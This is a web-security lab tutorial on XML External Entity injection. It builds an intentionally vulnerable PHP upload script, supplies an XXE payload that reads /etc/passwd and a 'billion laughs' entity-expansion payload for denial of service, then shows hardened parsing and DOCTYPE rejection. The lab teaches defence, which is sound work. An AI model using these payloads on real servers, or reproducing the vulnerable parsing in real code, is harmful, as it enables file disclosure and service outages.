Objective
Learn how to exploit XML External Entity (XXE) vulnerabilities to read sensitive server files or cause denial-of-service (DoS) attacks, and understand how to prevent such vulnerabilities using secure XML parsing practices.
Scenario
You are testing a file upload feature of a web application that processes XML data. Due to misconfigured XML parsing, the application is vulnerable to XXE Injection, allowing attackers to access sensitive server files or perform DoS attacks. Your goal is to exploit this vulnerability and learn how to secure XML parsing.
Lab Setup
Prerequisites:
- Basic knowledge of XML and PHP.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for XML Processing
Create a file upload.php:

```php
<?php
if (isset($_POST['submit'])) {
    $xml = $_FILES['xmlFile']['tmp_name'];
    $content = file_get_contents($xml);
    $doc = new DOMDocument();
    // Vulnerable: the uploaded document is parsed with default options, so any
    // DOCTYPE it carries is honoured and the entities declared there are resolved.
    $doc->loadXML($content);
    $items = $doc->getElementsByTagName('item');
    foreach ($items as $item) {
        // The resolved content is echoed straight back to the browser.
        echo "<p>" . $item->nodeValue . "</p>";
    }
}
?>
<form method="POST" enctype="multipart/form-data">
    Upload XML File: <input type="file" name="xmlFile" required>
    <button type="submit" name="submit">Upload</button>
</form>
```
Running the Application
- Start the Apache server.
- Place upload.php in the web server's root directory (htdocs for XAMPP).
- Open http://localhost/upload.php in your browser.
Exploitation Steps
Step 1: Crafting the Malicious XML Payload
Create a file payload.xml:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<item>&xxe;</item>
</data>
```
Upload payload.xml through the file upload form.
Expected Result:
- The content of the /etc/passwd file is displayed, confirming the vulnerability.
Step 2: Denial-of-Service Attack
Create a file billion_laughs.xml:

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<data>
<item>&lol2;</item>
</data>
```
Upload billion_laughs.xml to trigger resource exhaustion.
Expected Result:
- The server slows down or crashes due to exponential entity expansion.
Solution and Prevention
Problem Analysis
- The XML parser honours the entity declarations in the uploaded document's DOCTYPE: an external (SYSTEM) entity pulls a local file into the output, and nested internal entities expand into a payload large enough to exhaust server resources.
Fixing the Vulnerability
Disable External Entity Loading
Modify upload.php so that the parser neither fetches external entities nor substitutes entity references. Note that the libxml flags matter: LIBXML_NOENT turns entity substitution on and LIBXML_DTDLOAD fetches external DTDs, so neither belongs in a fix.

```php
<?php
if (isset($_POST['submit'])) {
    $xml = $_FILES['xmlFile']['tmp_name'];
    $content = file_get_contents($xml);

    // On PHP < 8.0 the external entity loader is enabled by default; disable it.
    // The function is deprecated on PHP >= 8.0, where the loader is already off
    // when libxml >= 2.9 is in use.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    $doc = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing. Do NOT pass
    // LIBXML_NOENT (entity substitution ON) or LIBXML_DTDLOAD (load external
    // DTDs): those flags would re-enable the vulnerability.
    $doc->loadXML($content, LIBXML_NONET);
    $items = $doc->getElementsByTagName('item');
    foreach ($items as $item) {
        // Encode output so a crafted <item> cannot inject HTML into the page.
        echo "<p>" . htmlspecialchars($item->nodeValue) . "</p>";
    }
}
?>
```
Use Secure XML Parsers
If you use SimpleXML instead, configure it the same way: it shares the libxml2 back end with DOMDocument, so entity loading must be disabled as above and LIBXML_NOENT / LIBXML_DTDLOAD must not be passed:

```php
$xml = simplexml_load_file($_FILES['xmlFile']['tmp_name'], "SimpleXMLElement", LIBXML_NONET);
```
Validate and Sanitize Input
Use schema validation to ensure only valid XML is processed.
Limit File Uploads
Restrict file size and type to prevent malicious uploads.
Testing After Fix
- Re-upload the malicious payload.xml.
- Expected Result: the external entity is not processed, and the file content is not leaked.
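Putting the fix and the post-fix test together, here is an added example (not the lab's own upload.php) of a hardened parsing routine that rejects any DOCTYPE before parsing, which blocks both lab payloads at once, and then runs it against the lab's payload.xml and a harmless document. The function name, the exception type and the sample strings are chosen here for illustration.

```php
<?php
// Added example, not part of the lab's original upload.php. The function name,
// exception type and sample strings are chosen here for illustration.

// Return the text of every <item>, or throw if the document is rejected. Any
// DOCTYPE is refused: the lab's application never needs one, and both lab
// payloads (file read and entity bomb) must declare their entities in one.
function parseItemsSafely(string $content): array
{
    // 1. Refuse a DTD before the parser ever sees it.
    if (preg_match('/<!DOCTYPE/i', $content)) {
        throw new InvalidArgumentException('DOCTYPE declarations are not allowed');
    }
    // 2. PHP < 8.0 fetches external entities by default; switch that off.
    //    Deprecated, and already the default, on PHP >= 8.0 with libxml >= 2.9.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    // 3. Parse with network access forbidden. Never pass LIBXML_NOENT (it turns
    //    entity substitution ON) or LIBXML_DTDLOAD (it loads external DTDs).
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    if (!$doc->loadXML($content, LIBXML_NONET)) {
        throw new InvalidArgumentException('Malformed XML');
    }
    // 4. Second check on the parsed tree: no DTD node may be present.
    if ($doc->doctype !== null) {
        throw new InvalidArgumentException('Unexpected DTD');
    }
    $items = [];
    foreach ($doc->getElementsByTagName('item') as $item) {
        $items[] = $item->nodeValue;
    }
    return $items;
}

// Constructed inputs: the lab's payload.xml, and a harmless upload.
$xxe = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
     . '<data><item>&xxe;</item></data>';
$benign = '<?xml version="1.0"?><data><item>first</item><item>second &amp; third</item></data>';

try {
    parseItemsSafely($xxe);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
foreach (parseItemsSafely($benign) as $text) {
    echo "<p>" . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . "</p>\n";
}
```

Rejecting the DOCTYPE is stricter than the flag-only fix above: it also stops the internal-entity expansion in billion_laughs.xml, which no libxml loader setting addresses.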
Conclusion
In this lab, you exploited an XML External Entity (XXE) vulnerability to read server files and cause a denial-of-service attack. You also learned how to prevent such attacks by disabling external entity processing, using secure XML parsers, and implementing strict input validation.